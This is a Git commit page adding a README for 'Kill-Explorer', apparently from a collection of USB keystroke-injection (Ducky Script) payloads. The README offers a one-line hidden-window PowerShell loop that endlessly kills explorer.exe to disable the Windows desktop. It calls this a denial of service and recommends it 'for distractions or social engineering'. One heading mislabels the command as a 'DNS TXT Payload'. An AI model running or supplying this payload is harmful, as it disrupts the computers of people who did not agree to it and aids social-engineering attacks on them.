Create README.md

pull/468/head
Nate 2024-08-04 20:06:35 -05:00 committed by GitHub
parent e1c39bd455
commit 97ae3a7339
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 0 deletions

View File

@ -0,0 +1,12 @@
# Kill-Explorer
A ducky script that kills explorer.exe repeatedly resulting in loss of Windows Desktop functionality. The command executed is a simple Denial of Service for the intended user.
## Configuration
1. Execute on windows 10 or Windows 11.
2. Logoff or restart to reset your windows session.
## Notes
A great tool for distractions or social engineering.
## Windows Commands (used in payload)
### Execute DNS TXT Payload
```Powershell
powershell /w 1 while($true){kill -name explorer}
```